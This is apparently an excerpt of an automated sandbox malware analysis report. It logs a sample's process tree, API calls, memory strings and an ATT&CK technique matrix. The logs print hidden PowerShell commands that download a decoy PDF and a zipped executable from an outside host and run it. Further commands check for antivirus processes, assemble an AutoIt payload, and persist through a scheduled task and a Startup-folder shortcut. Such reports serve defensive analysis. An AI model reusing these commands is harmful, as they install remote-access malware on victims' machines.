Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B60D45 SetUnhandledExceptionFilter,33_2_00B60D45
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B60F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00B60F91
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BA1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,33_2_00BA1B4D
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B4338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,33_2_00B4338B
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BABBED SendInput,keybd_event,33_2_00BABBED
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BAEC9E mouse_event,33_2_00BAEC9E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & echo url="c:\users\user\appdata\local\mediafusion technologies inc\cineblend.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & exit
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & echo url="c:\users\user\appdata\local\mediafusion technologies inc\cineblend.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & exit
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BA14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,33_2_00BA14AE
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BA1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,33_2_00BA1FB0
Source: Prostores.com, 00000019.00000000.1775020071.0000000000543000.00000002.00000001.01000000.00000009.sdmp, Prostores.com, 00000019.00000003.1782508757.0000000003B57000.00000004.00000800.00020000.00000000.sdmp, CineBlend.scr, 00000021.00000000.1793808073.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CineBlend.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B60A08 cpuid 33_2_00B60A08
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B9E5F4 GetLocalTime,33_2_00B9E5F4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B9E652 GetUserNameW,33_2_00B9E652
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B7BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,33_2_00B7BCD2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,15_2_00406831
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: CineBlend.scrBinary or memory string: WIN_81
Source: CineBlend.scrBinary or memory string: WIN_XP
Source: CineBlend.scr, 00000025.00000002.1933168196.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: CineBlend.scrBinary or memory string: WIN_XPe
Source: CineBlend.scrBinary or memory string: WIN_VISTA
Source: CineBlend.scrBinary or memory string: WIN_7
Source: CineBlend.scrBinary or memory string: WIN_8

Remote Access Functionality

barindex
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comMutex created: \Sessions\1\BaseNamedObjects\Rmc-LOARC0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BC2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,33_2_00BC2263
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BC1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,33_2_00BC1C61
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
2
Valid Accounts
21
Windows Management Instrumentation
111
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
121
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol121
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Remote Access Software
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
21
Access Token Manipulation
1
DLL Side-Loading
NTDS57
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell
2
Registry Run Keys / Startup Folder
12
Process Injection
111
Masquerading
LSA Secrets141
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Scheduled Task/Job
2
Valid Accounts
Cached Domain Credentials141
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
Registry Run Keys / Startup Folder
141
Virtualization/Sandbox Evasion
DCSync4
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
